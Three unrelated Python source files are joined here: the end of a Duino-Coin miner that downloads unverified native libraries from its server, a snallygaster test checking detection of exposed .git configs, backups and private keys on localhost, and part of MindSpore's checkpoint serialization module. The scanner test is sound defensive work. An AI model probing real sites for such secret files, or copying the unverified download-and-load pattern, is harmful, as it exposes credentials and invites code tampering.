accept.value += 1
blocks.value += 1
share_print(id, "block",
accept.value, reject.value,
total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BAD":
reject.value += 1
share_print(id, "reject",
accept.value, reject.value,
total_hashrate,
computetime, job[2], ping,
back_color, feedback[1])
if id == 0:
end_time = time()
elapsed_time = end_time - last_report
if elapsed_time >= int(user_settings["report_sec"]):
r_shares = accept.value - last_shares
uptime = calculate_uptime(
mining_start_time)
periodic_report(last_report, end_time,
r_shares, blocks.value,
sum(hashrate.values()),
uptime)
last_report = time()
last_shares = accept.value
break
break
except Exception as e:
pretty_print(get_string("error_while_mining")
+ " " + str(e), "error", "net" + str(id))
sleep(5)
break
except Exception as e:
pretty_print(get_string("error_while_mining")
+ " " + str(e), "error", "net" + str(id))
class Discord_rp:
def connect():
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
Thread(target=Discord_rp.update).start()
except Exception as e:
pretty_print(get_string("Error launching Discord RPC thread: " + str(e)))
def update():
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate.values()), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(accept.value) + "/"
+ str(reject.value + accept.value)
+ " accepted shares",
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
pretty_print(get_string("Error updating Discord RPC thread: " + str(e)))
sleep(15)
class Fasthash:
def init():
try:
"""
Check wheter libducohash fasthash is available
to speed up the DUCOS1 work, created by @HGEpro
"""
import libducohasher
pretty_print(get_string("fasthash_available"), "info")
except Exception as e:
if int(python_version_tuple()[1]) <= 6:
pretty_print(
(f"Your Python version is too old ({python_version()}).\n"
+ "Fasthash accelerations and other features may not work"
+ " on your outdated installation.\n"
+ "We suggest updating your python to version 3.7 or higher."
).replace("\n", "\n\t\t"), 'warning', 'sys0')
else:
pretty_print(
("Fasthash accelerations are not available for your OS.\n"
+ "If you wish to compile them for your system, visit:\n"
+ "https://github.com/revoxhere/duino-coin/wiki/"
+ "How-to-compile-fasthash-accelerations\n"
+ f"(Libducohash couldn't be loaded: {str(e)})"
).replace("\n", "\n\t\t"), 'warning', 'sys0')
sleep(15)
def load():
if os.name == 'nt':
if not Path("libducohasher.pyd").is_file():
pretty_print(get_string("fasthash_download"), "info")
url = ('https://server.duinocoin.com/'
+ 'fasthash/libducohashWindows.pyd')
r = requests.get(url, timeout=10)
with open(f"libducohasher.pyd", 'wb') as f:
f.write(r.content)
return
elif os.name == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'fasthash/libducohashPi4.so')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'fasthash/libducohashPi4_32.so')
elif osprocessor() == "armv6l":
url = ('https://server.duinocoin.com/'
+ 'fasthash/libducohashPiZero.so')
elif osprocessor() == "x86_64":
url = ('https://server.duinocoin.com/'
+ 'fasthash/libducohashLinux.so')
else:
pretty_print(
("Fasthash accelerations are not available for your OS.\n"
+ "If you wish to compile them for your system, visit:\n"
+ "https://github.com/revoxhere/duino-coin/wiki/"
+ "How-to-compile-fasthash-accelerations\n"
+ f"(Invalid processor architecture: {osprocessor()})"
).replace("\n", "\n\t\t"), 'warning', 'sys0')
sleep(15)
return
if not Path("libducohasher.so").is_file():
pretty_print(get_string("fasthash_download"), "info")
r = requests.get(url, timeout=10)
with open("libducohasher.so", "wb") as f:
f.write(r.content)
return
else:
pretty_print(
("Fasthash accelerations are not available for your OS.\n"
+ "If you wish to compile them for your system, visit:\n"
+ "https://github.com/revoxhere/duino-coin/wiki/"
+ "How-to-compile-fasthash-accelerations\n"
+ f"(Invalid OS: {os.name})"
).replace("\n", "\n\t\t"), 'warning', 'sys0')
sleep(15)
return
Miner.preload()
p_list = []
mining_start_time = time()
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
signal(SIGINT, handler)
if sys.platform == "win32":
os.system('') # Enable VT100 Escape Sequence for WINDOWS 10 Ver. 1607
check_updates()
cpu = cpuinfo.get_cpu_info()
accept = Manager().Value("i", 0)
reject = Manager().Value("i", 0)
blocks = Manager().Value("i", 0)
hashrate = Manager().dict()
user_settings = Miner.load_cfg()
Miner.greeting()
Fasthash.load()
Fasthash.init()
try:
check_mining_key(user_settings)
except Exception as e:
print("Error checking mining key:", e)
Donate.load(int(user_settings["donate"]))
Donate.start(int(user_settings["donate"]))
"""
Generate a random number that's used to
group miners with many threads in the wallet
"""
single_miner_id = randint(0, 2811)
threads = int(user_settings["threads"])
if threads > 12:
threads = 12
pretty_print(Style.BRIGHT
+ get_string("max_threads_notice"))
fastest_pool = Client.fetch_pool()
for i in range(threads):
p = Process(target=Miner.mine,
args=[i, user_settings, blocks,
fastest_pool, accept, reject,
hashrate, single_miner_id])
p_list.append(p)
p.start()
sleep(0.05)
if user_settings["discord_rp"] == 'y':
Discord_rp.connect()
for p in p_list:
p.join()
|
test_scan_testdata.py
|
import unittest
import subprocess
import os
import tempfile
import http.server
import ssl
import threading
TESTDATA_REPO = "https://github.com/hannob/snallygaster-testdata"
TESTDATA = {"backup_archive": "[backup_archive] https://localhost:4443/backup.zip",
"git_dir": "[git_dir] https://localhost:4443/.git/config",
"deadjoe": "[deadjoe] https://localhost:4443/DEADJOE",
"coredump": "[coredump] https://localhost:4443/core",
"backupfiles": "[backupfiles] https://localhost:4443/index.php~",
"ds_store": "[ds_store] https://localhost:4443/.DS_Store",
"privatekey": "[privatekey_pkcs8] https://localhost:4443/server.key",
}
class TestScanTestdata(unittest.TestCase):
@unittest.skipUnless(os.environ.get("RUN_ONLINETESTS"),
"Not running online tests")
def test_scan_testdata(self):
tmp = tempfile.mkdtemp(prefix="testdata")
if os.environ.get("TESTDATA_REPOSITORY"):
os.symlink(os.environ.get("TESTDATA_REPOSITORY"),
tmp + "/testdata")
else:
subprocess.run(["git", "clone", "--depth=1",
TESTDATA_REPO,
tmp + "/testdata"],
check=True)
olddir = os.getcwd()
os.chdir(tmp + "/testdata")
httpd = http.server.HTTPServer(('localhost', 4443), http.server.SimpleHTTPRequestHandler)
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.load_cert_chain(certfile=tmp + '/testdata/testserver.pem')
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
for test, expected in TESTDATA.items():
testrun = subprocess.run([olddir + "/snallygaster", "-t", test, "localhost:4443",
"--nowww", "--nohttp"],
stdout=subprocess.PIPE, check=True)
output = testrun.stdout.decode("utf-8").rstrip()
self.assertEqual(output, expected)
if __name__ == '__main__':
unittest.main()
|
serialization.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Model and parameters serialization."""
import os
import stat
import math
from threading import Thread, Lock
import numpy as np
import mindspore.nn as nn
from mindspore import log as logger
from mindspore.train.checkpoint_pb2 import Checkpoint
from mindspore.train.print_pb2 import Print
from mindspore.train.node_strategy_pb2 import ParallelStrategyMap
from mindspore.common.tensor import Tensor
from mindspore.common.initializer import initializer
from mindspore.common.parameter import Parameter
from mindspore.common.api import _executor
from mindspore.common import dtype as mstype
from mindspore._checkparam import check_input_data
from mindspore.train.quant import quant
import mindspore.context as context
from .._checkparam import Validator
__all__ = ["save_checkpoint", "load_checkpoint", "load_param_into_net", "export", "parse_print",
"build_searched_strategy", "merge_sliced_parameter"]
tensor_to_ms_type = {"Int8": mstype.int8, "Uint8": mstype.uint8, "Int16": mstype.int16, "Uint16": mstype.uint16,
"Int32": mstype.int32, "Uint32": mstype.uint32, "Int64": mstype.int64, "Uint64": mstype.uint64,
"Float16": mstype.float16, "Float32": mstype.float32, "Float64": mstype.float64,
"Bool": mstype.bool_}
tensor_to_np_type = {"Int8": np.int8, "Uint8": np.uint8, "Int16": np.int16, "Uint16": np.uint16,
"Int32": np.int32, "Uint32": np.uint32, "Int64": np.int64, "Uint64": np.uint64,
"Float16": np.float16, "Float32": np.float32, "Float64": np.float64, "Bool": np.bool_}
_ckpt_mutex = Lock()
SLICE_SIZE = 512 * 1024 * 1024
def _set_pb_env():
"""Set env variable `PROTOCOL_BUFFERS` to prevent memory overflow."""
if os.getenv("PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION") == "cpp":
logger.warning("Current env variable `PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION=cpp`,\
When the parameter is too large, it may cause memory limit error.\
This can be solved by set env `PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION=python`.")
else:
os.environ["PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION"] = "python"
logger.debug("Set the `PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION=python`.")
def _special_process_par(par, new_par):
"""
Processes the special condition.
Like (12,2048,1,1)->(12,2048), this case is caused by GE 4 dimensions tensor.
"""
par_shape_len = len(par.data.shape)
new_par_shape_len = len(new_par.data.shape)
delta_len = new_par_shape_len - par_shape_len
delta_i = 0
for delta_i in range(delta_len):
if new_par.data.shape[par_shape_len + delta_i] != 1:
break
if delta_i == delta_len - 1:
new_val = new_par.data.asnumpy()
new_val = new_val.reshape(par.data.shape)
par.set_data(Tensor(new_val, par.data.dtype))
return True
return False
def _update_param(param, new_param):
"""Updates param's data from new_param's data."""
if isinstance(param.data, Tensor) and isinstance(new_param.data, Tensor):
if param.data.dtype != new_param.data.dtype:
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, param.data.dtype, new_param.data.dtype))
raise RuntimeError(msg)
if param.data.shape != new_param.data.shape:
if not _special_process_par(param, new_param):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) different from parameter_dict's({})"
.format(param.name, param.data.shape, new_param.data.shape))
raise RuntimeError(msg)
return
param.set_data(new_param.data)
return
if isinstance(param.data, Tensor) and not isinstance(new_param.data, Tensor):
if param.data.shape != (1,) and param.data.shape != ():
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) is not (1,), inconsitent with parameter_dict's(scalar)."
.format(param.name, param.data.shape))
raise RuntimeError(msg)
param.set_data(initializer(new_param.data, param.data.shape, param.data.dtype))
elif isinstance(new_param.data, Tensor) and not isinstance(param.data, Tensor):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, type(param.data), type(new_param.data)))
raise RuntimeError(msg)
else:
param.set_data(type(param.data)(new_param.data))
def _exec_save(ckpt_file_name, data_list):
"""Execute save checkpoint into file process."""
try:
with _ckpt_mutex:
if os.path.exists(ckpt_file_name):
os.remove(ckpt_file_name)
with open(ckpt_file_name, "ab") as f:
for name, value in data_list.items():
data_size = value[2].nbytes
if data_size > SLICE_SIZE:
slice_count = math.ceil(data_size / SLICE_SIZE)
param_slice_list = np.array_split(value[2], slice_count)
else:
param_slice_list = [value[2]]
for param_slice in param_slice_list:
checkpoint_list = Checkpoint()
param_value = checkpoint_list.value.add()
param_value.tag = name
param_tensor = param_value.tensor
param_tensor.dims.extend(value[0])
param_tensor.tensor_type = value[1]
param_tensor.tensor_content = param_slice.tostring()
f.write(checkpoint_list.SerializeToString())
os.chmod(ckpt_file_name, stat.S_IRUSR)
except BaseException as e:
logger.error("Failed to save the checkpoint file %s.", ckpt_file_name)
raise e
def save_checkpoint(save_obj, ckpt_file_name, integrated_save=True, async_save=False):
"""
Saves checkpoint info to a specified file.
Args:
save_obj (nn.Cell or list): The cell object or data list(each element is a dictionary, like
[{"name": param_name, "data": param_data},...], the type of param_name would
be string, and the type of param_data would be parameter or tensor).
ckpt_file_name (str): Checkpoint file name. If the file name already exists, it will be overwritten.
integrated_save (bool): Whether to integrated save in automatic model parallel scene. Default: True
async_save (bool): Whether asynchronous execution saves the checkpoint to a file. Default: False
Raises:
TypeError: If the parameter save_obj is not nn.Cell or list type.And if the parameter integrated_save and
async_save are not bool type.
"""
if not isinstance(save_obj, nn.Cell) and not isinstance(save_obj, list):
raise TypeError("The parameter save_obj should be nn.Cell or list, but got {}".format(type(save_obj)))
if not isinstance(integrated_save, bool):
raise TypeError("The parameter integrated_save should be bool, but got {}".format(type(integrated_save)))
if not isinstance(async_save, bool):
raise TypeError("The parameter async_save should be bool, but got {}".format(type(async_save)))
logger.info("Execute save checkpoint process.")
if isinstance(save_obj, nn.Cell):
save_obj.init_parameters_data()
param_dict = {}
for _, param in save_obj.parameters_and_names():
param_dict[param.name] = param
param_list = []
for (key, value) in param_dict.items():
each_param = {"name": key}
param_data = Tensor(value.data)
# in automatic model parallel scenario, some parameters were spliteds to all the devices,
# which should be combined before saving
if integrated_save and key in save_obj.parameter_layout_dict:
param_data = _get_merged_param_data(save_obj, key, param_data)
each_param["data"] = param_data
param_list.append(each_param)
save_obj = param_list
data_list = {}
with _ckpt_mutex:
for param in save_obj:
key = param["name"]
data_list[key] = []
if isinstance(param["data"], Parameter):
param["data"].init_data()
dims = []
if param['data'].shape == ():
dims.append(0)
else:
for dim in param['data'].shape:
dims.append(dim)
data_list[key].append(dims)
tensor_type = str(param["data"].dtype)
data_list[key].append(tensor_type)
data = param["data"].asnumpy().reshape(-1)
data_list[key].append(data)
if async_save:
thr = Thread(target=_exec_save, args=(ckpt_file_name, data_list), name="asyn_save_ckpt")
thr.start()
else:
_exec_save(ckpt_file_name, data_list)
logger.info("Save checkpoint process finish.")
def load_checkpoint(ckpt_file_name, net=None):
"""
Loads checkpoint info from a specified file.
Args:
ckpt_file_name (str): Checkpoint file name.
net (Cell): Cell network. Default: None
Returns:
Dict, key is parameter name, value is a Parameter.
Raises:
ValueError: Checkpoint file is incorrect.
"""
if not isinstance(ckpt_file_name, str):
raise ValueError("The ckpt_file_name must be string.")
if not os.path.exists(ckpt_file_name):
raise ValueError("The checkpoint file is not exist.")
if ckpt_file_name[-5:] != ".ckpt":
raise ValueError("Please input the correct checkpoint file name.")
if os.path.getsize(ckpt_file_name) == 0:
raise ValueError("The checkpoint file may be empty, please make sure enter the correct file name.")
logger.info("Execute load checkpoint process.")
checkpoint_list = Checkpoint()
try:
with open(ckpt_file_name, "rb") as f:
pb_content = f.read()
checkpoint_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the checkpoint file `%s`, please check the correct of the file.", ckpt_file_name)
raise ValueError(e.__str__())
parameter_dict = {}
try:
element_id = 0
param_data_list = []
for element in checkpoint_list.value:
data = element.tensor.tensor_content
data_type = element.tensor.tensor_type
np_type = tensor_to_np_type[data_type]
ms_type = tensor_to_ms_type[data_type]
element_data = np.frombuffer(data, np_type)
param_data_list.append(element_data)
if (element_id == len(checkpoint_list.value) - 1) or \
(element.tag != checkpoint_list.value[element_id + 1].tag):
param_data = np.concatenate((param_data_list), axis=0)
param_data_list.clear()
dims = element.tensor.dims
if dims == [0]:
if 'Float' in data_type:
param_data = float(param_data[0])
elif 'Int' in data_type:
param_data = int(param_data[0])
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
elif dims == [1]:
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
else:
param_dim = []
for dim in dims:
param_dim.append(dim)
param_value = param_data.reshape(param_dim)
parameter_dict[element.tag] = Parameter(Tensor(param_value, ms_type), name=element.tag)
element_id += 1
logger.info("Load checkpoint process finish.")
except BaseException as e:
logger.error("Failed to load the checkpoint file `%s`.", ckpt_file_name)
raise RuntimeError(e.__str__())
if net is not None:
load_param_into_net(net, parameter_dict)
return parameter_dict
def load_param_into_net(net, parameter_dict):
"""
Loads parameters into network.
Args:
net (Cell): Cell network.
parameter_dict (dict): Parameter dictionary.
Raises:
TypeError: Argument is not a Cell, or parameter_dict is not a Parameter dictionary.
"""
if not isinstance(net, nn.Cell):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument net should be a Cell, but got {}.".format(type(net)))
raise TypeError(msg)
if not isinstance(parameter_dict, dict):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict should be a dict, but got {}.".format(type(parameter_dict)))
raise TypeError(msg)
logger.info("Execute load parameter into net process.")
net.init_parameters_data()
param_not_load = []
for _, param in net.parameters_and_names():
if param.name in parameter_dict:
new_param = parameter_dict[param.name]
if not isinstance(new_param, Parameter):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict element should be a Parameter, but got {}.".format(type(new_param)))
raise TypeError(msg)
_update_param(param, new_param)
else:
param_not_load.append(param.name)
if param_not_load:
_load_dismatch_prefix_params(net, parameter_dict, param_not_load)
logger.debug("Params not matched(in net but not in parameter_dict):")
for param_name in param_not_load:
logger.debug("%s", param_name)
logger.info("Load parameter into net finish, {} parameters has not been loaded.".format(len(param_not_load)))
return param_not_load
def _load_dismatch_prefix_params(net, parameter_dict, param_not_load):
"""When some net parameter did not load, try to continue load."""
prefix_name = ""
longest_name = param_not_load[0]
while prefix_name != longest_name and param_not_load:
logger.debug("Count: {} parameters has not been loaded, try to load continue.".format(len(param_not_load)))
prefix_name = longest_name
for net_param_name in param_not_load:
for dict_name in parameter_dict:
if dict_name.endswith(net_param_name):
prefix_name = dict_name[:-len(net_param_name)]
break
if prefix_name != longest_name:
break
if prefix_name != longest_name:
logger.warning("Remove parameter prefix name: {}, continue to load.".format(prefix_name))
for _, param in net.parameters_and_names():
new_param_name = prefix_name + param.name
if param.name in param_not_load and new_param_name in parameter_dict:
new_param = parameter_dict[new_param_name]
_update_param(param, new_param)
param_not_load.remove(param.name)
def _save_graph(network, file_name):
"""
Saves the graph of network to a file.
Args:
network (Cell): Obtain a pipeline through network for saving graph.
file_name (str): Graph file name into which the graph will be saved.
"""
logger.info("Execute save the graph process.")
graph_proto = network.get_func_graph_proto()
if graph_proto:
with open(file_name, "wb") as f:
f.write(graph_proto)
os.chmod(file_name, stat.S_IRUSR)
def _get_merged_param_data(net, param_name, param_data):
"""
Gets the merged data(tensor) from tensor slice, by device arrangement and tensor map.
Args:
net (Cell): MindSpore network.
param_name(str): The parameter name, which to be combined.
param_data(Tensor):The parameter data on the local device,
It was a slice of the whole parameter data.
Returns:
Tensor, the combined tensor which with the whole data value.
"""
layout = net.parameter_layout_dict[param_name]
if len(layout) < 6:
logger.info("layout dict does not contain the key %s", param_name)
return param_data
dev_mat = layout[0]
tensor_map = layout[1]
field_size = layout[3]
uniform_split = layout[4]
opt_shard_group = layout[5]
if uniform_split == 0:
raise RuntimeError("Save checkpoint only support uniform split tensor now.")
from mindspore.parallel._cell_wrapper import get_allgather_cell
from mindspore.parallel._tensor import _reshape_param_data, _reshape_param_data_with_weight
# while any dim is not equal to -1, means param is split and needs to be merged
# pipeline parallel need to be supported here later
for dim in tensor_map:
if dim != -1 or opt_shard_group:
allgather_net = get_allgather_cell(opt_shard_group)
param_data = allgather_net(param_data)
if field_size:
return _reshape_param_data_with_weight(param_data, dev_mat, field_size)
return _reshape_param_data(param_data, dev_mat, tensor_map)
return param_data
def _fill_param_into_net(net, parameter_list):
"""
Fills parameter_list into net.
Args:
net (Cell): train network.
parameter_list (list): parameters list from ge callback.
"""
parameter_dict = {}
for each_param in parameter_list:
param_name = each_param["name"]
if isinstance(each_param["data"], Parameter):
each_param["data"].init_data()
np_val = each_param["data"].asnumpy()
if np_val.shape == (1,):
parameter_dict[param_name] = Parameter(np_val, name=param_name)
elif np_val.shape == ():
parameter_dict[param_name] = Parameter(Tensor(np_val.tolist(), mstype.pytype_to_dtype(np_val.dtype)),
name=param_name)
else:
parameter_dict[param_name] = Parameter(Tensor(np_val), name=param_name)
load_param_into_net(net, parameter_dict)
def export(net, *inputs, file_name, file_format='AIR', **kwargs):
"""
Export the MindSpore prediction model to a file in the specified format.
Args:
net (Cell): MindSpore network.
inputs (Tensor): Inputs of the `net`.
file_name (str): File name of the model to be exported.
file_format (str): MindSpore currently supports 'AIR', 'ONNX' and 'MINDIR' format for exported model.
- AIR: Ascend Intermidiate Representation. An intermidiate representation format of Ascend model.
Recommended suffix for output file is '.air'.
- ONNX: Open Neural Network eXchange. An open format built to represent machine learning models.
Recommended suffix for output file is '.onnx'.
- MINDIR: MindSpore Native Intermidiate Representation for Anf. An intermidiate representation format
for MindSpore models.
Recommended suffix for output file is '.mindir'.
kwargs (dict): Configuration options dictionary.
- quant_mode: The mode of quant.
- mean: Input data mean. Default: 127.5.
- std_dev: Input data variance. Default: 127.5.
"""
logger.info("exporting model file:%s format:%s.", file_name, file_format)
check_input_data(*inputs, data_class=Tensor)
net = _quant_export(net, *inputs, file_format='AIR', **kwargs)
_export(net, file_name, file_format, *inputs)
def _export(net, file_name, file_format, *inputs):
"""
It is an internal conversion function. Export the MindSpore prediction model to a file in the specified format.
"""
logger.info("exporting model file:%s format:%s.", file_name, file_format)
check_input_data(*inputs, data_class=Tensor)
if file_format == 'GEIR':
logger.warning(f"Format 'GEIR' is deprecated, it would be removed in future release, use 'AIR' instead.")
file_format = 'AIR'
supported_formats = ['AIR', 'ONNX', 'MINDIR']
if file_format not in supported_formats:
raise ValueError(f'Illegal file format {file_format}, it must be one of {supported_formats}')
# When dumping ONNX file, switch network mode to infer when it is training(NOTE: ONNX only designed for prediction)
is_dump_onnx_in_training = net.training and file_format == 'ONNX'
if is_dump_onnx_in_training:
net.set_train(mode=False)
# export model
net.init_parameters_data()
if file_format == 'AIR':
phase_name = 'export.air'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name)
_executor.export(file_name, graph_id)
elif file_format == 'ONNX': # file_format is 'ONNX'
phase_name = 'export.onnx'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(graph_id)
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IWUSR | stat.S_IRUSR)
f.write(onnx_stream)
elif file_format == 'MINDIR': # file_format is 'MINDIR'
phase_name = 'export.mindir'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(graph_id, 'mind_ir')
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IWUSR | stat.S_IRUSR)
f.write(onnx_stream)
# restore network training mode
if is_dump_onnx_in_training:
net.set_train(mode=True)
def _quant_export(network, *inputs, file_format='AIR', **kwargs):
"""
Exports MindSpore quantization predict model to deploy with AIR and MINDIR.
"""
if not kwargs.get('quant_mode', None):
return network
supported_device = ["Ascend", "GPU"]
supported_formats = ['AIR', 'MINDIR']
quant_mode_formats = ['AUTO', 'MANUAL']
mean = kwargs['mean'] if kwargs.get('mean', None) else 127.5
std_dev = kwargs['std_dev'] if kwargs.get('std_dev', None) else 127.5
quant_mode = kwargs['quant_mode']
if quant_mode not in quant_mode_formats:
raise KeyError(f'Quant_mode input is wrong, Please choose the right mode of the quant_mode.')
mean = Validator.check_type("mean", mean, (int, float))
std_dev = Validator.check_type("std_dev", std_dev, (int, float))
if context.get_context('device_target') not in supported_device:
raise KeyError("Unsupported {} device target.".format(context.get_context('device_target')))
if file_format not in supported_formats:
raise ValueError('Illegal file format {}.'.format(file_format))
network.set_train(False)
if file_format == "MINDIR":
if quant_mode == 'MANUAL':
exporter = quant.ExportManualQuantNetwork(network, mean, std_dev, *inputs, is_mindir=True)
else:
exporter = quant.ExportToQuantInferNetwork(network, mean, std_dev, *inputs, is_mindir=True)
else:
if quant_mode == 'MANUAL':
exporter = quant.ExportManualQuantNetwork(network, mean, std_dev, *inputs)
else:
exporter = quant.ExportToQuantInferNetwork(network, mean, std_dev, *inputs)
deploy_net = exporter.run()
return deploy_net
def parse_print(print_file_name):
"""
Loads Print data from a specified file.
Args:
print_file_name (str): The file name of saved print data.
Returns:
List, element of list is Tensor.
Raises:
ValueError: The print file may be empty, please make sure enter the correct file name.
"""
print_file_path = os.path.realpath(print_file_name)
if os.path.getsize(print_file_path) == 0:
raise ValueError("The print file may be empty, please make sure enter the correct file name.")
logger.info("Execute load print process.")
print_list = Print()
try:
with open(print_file_path, "rb") as f:
pb_content = f.read()
print_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the print file %s, please check the correct of the file.", print_file_name)
raise ValueError(e.__str__())
tensor_list = []
try:
for print_ in print_list.value:
# String type
if print_.HasField("desc"):
tensor_list.append(print_.desc)
elif print_.HasField("tensor"):
dims = print_.tensor.dims
data_type = print_.tensor.tensor_type
data = print_.tensor.tensor_content
np_type = tensor_to_np_type[data_type]
param_data = np.fromstring(data, np_type)
ms_type = tensor_to_ms_type[data_type]
param_dim = []
for dim in dims:
param_dim.append(dim)
if param_dim:
param_value = param_data.reshape(param_dim)
tensor_list.append(Tensor(param_value, ms_type))
# Scale type
else:
data_type_ = data_type.lower()
if 'float' in data_type_:
param_data = float(param_data[0])
elif 'int' in data_type_:
param_data = int(param_data[0])
elif 'bool' in data_type_:
param_data = bool(param_data[0])
tensor_list.append(Tensor(param_data, ms_type))
except BaseException as e:
logger.error("Failed to load the print file %s.", print_list)
raise RuntimeError(e.__str__())
return tensor_list
def _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even):
"""
Merge data slices to one tensor with whole data when strategy is not None.
Args:
sliced_data (list[numpy.ndarray]): Data slices in order of rank_id.
parameter_name (str): Name of parameter.
strategy (dict): Parameter slice strategy.
is_even (bool): Slice manner that True represents slicing evenly and False represents slicing unevenly.
Returns:
Tensor, the merged Tensor which has the whole data.
Raises:
ValueError: Failed to merge.
"""
layout = strategy.get(parameter_name)
try:
dev_mat = list(layout.dev_matrix[0].dim)
tensor_map = list(layout.tensor_map[0].dim)
param_split_shape = list(layout.param_split_shape[0].dim)
field_size = int(layout.field)
except BaseException as e:
raise ValueError(f"{e.__str__()}. please make sure that strategy matches the node_strategy.proto.")
device_count = 1
for dim in dev_mat:
device_count *= dim
if len(sliced_data) != device_count:
raise ValueError(f"The sliced_parameters length should be equal to device_count. "
f"the sliced_parameters length is {len(sliced_data)} but device_count is {device_count}.")
merged_tensor = None
if not param_split_shape:
if not is_even:
raise ValueError("The shape of every parameter in sliced_parameters should be the same "
"when slice manner is even.")
all_gather_tensor = Tensor(np.concatenate(sliced_data))
if field_size > 0:
from mindspore.parallel._tensor import _reshape_param_data_with_weight
merged_tensor = _reshape_param_data_with_weight(all_gather_tensor, dev_mat, [field_size])
else:
from mindspore.parallel._tensor import _reshape_param_data
merged_tensor = _reshape_param_data(all_gather_tensor, dev_mat, tensor_map)
else:
from mindspore.parallel._tensor import _get_tensor_strategy, _get_tensor_slice_index
tensor_strategy = _get_tensor_strategy(dev_mat, tensor_map)
slice_count = 1
for dim in tensor_strategy:
slice_count *= dim
if len(param_split_shape) != slice_count:
raise ValueError(f"The param_split_shape length in strategy should be {slice_count}, "
f"but got {len(param_split_shape)}.")
tensor_slices_new = list(range(slice_count))
tensor_slices = sliced_data
for i in range(device_count):
slice_index = int(_get_tensor_slice_index(dev_mat, tensor_strategy, tensor_map, i))
if tensor_slices[i].shape[0] != param_split_shape[slice_index]:
raise ValueError(f"The slice {slice_index} is {param_split_shape[slice_index]} in 0 axis, "
f"but got {tensor_slices[i].shape[0]}.")
tensor_slices_new[slice_index] = np.array(tensor_slices[i])
dim_len = len(tensor_strategy)
for i in range(dim_len):
ele_count = int(len(tensor_slices_new) / tensor_strategy[dim_len - 1 - i])
tensor_slices_new_inner = []
for j in range(ele_count):
new_tensor = tensor_slices_new[j * tensor_strategy[dim_len - 1 - i]]
for l in range(j * tensor_strategy[dim_len - 1 - i] + 1,
(j + 1) * tensor_strategy[dim_len - 1 - i]):
new_tensor = np.concatenate((new_tensor, tensor_slices_new[l]), axis=dim_len - 1 - i)
tensor_slices_new_inner.insert(len(tensor_slices_new_inner), np.array(new_tensor))
tensor_slices_new = tensor_slices_new_inner
merged_tensor = Tensor(tensor_slices_new[0])
return merged_tensor
def build_searched_strategy(strategy_filename):
"""
Build strategy of every parameter in network.
Args:
strategy_filename (str): Name of strategy file.
Returns:
Dictionary, whose key is parameter name and value is slice strategy of this parameter.
Raises:
ValueError: Strategy file is incorrect.
TypeError: Strategy_filename is not str.
Examples:
>>> strategy_filename = "./strategy_train.ckpt"
>>> strategy = build_searched_strategy(strategy_filename)
"""
if not isinstance(strategy_filename, str):
raise TypeError(f"The strategy_filename should be str, but got {type(strategy_filename)}.")
if not os.path.isfile(strategy_filename):
raise ValueError(f"No such strategy file: {strategy_filename}.")
if os.path.getsize(strategy_filename) == 0:
raise ValueError("The strategy file should not be empty.")
parallel_strategy_map = ParallelStrategyMap()
with open(strategy_filename, 'rb') as f:
pb_content = f.read()
parallel_strategy_map.ParseFromString(pb_content)
layout_items = parallel_strategy_map.parallel_layout_item
if not layout_items:
raise ValueError("The strategy file has no sliced parameter.")
strategy = {}
for layout_item in layout_items:
parameter_name = layout_item.param_name
layout = layout_item.parallel_layouts
strategy[parameter_name] = layout
return strategy
def merge_sliced_parameter(sliced_parameters, strategy=None):
"""
Merge parameter slices to one whole parameter.
Args:
sliced_parameters (list[Parameter]): Parameter slices in order of rank_id.
strategy (dict): Parameter slice strategy, the default is None.
If strategy is None, just merge parameter slices in 0 axis order.
- key (str): Parameter name.
- value (<class 'node_strategy_pb2.ParallelLayouts'>): Slice strategy of this parameter.
Returns:
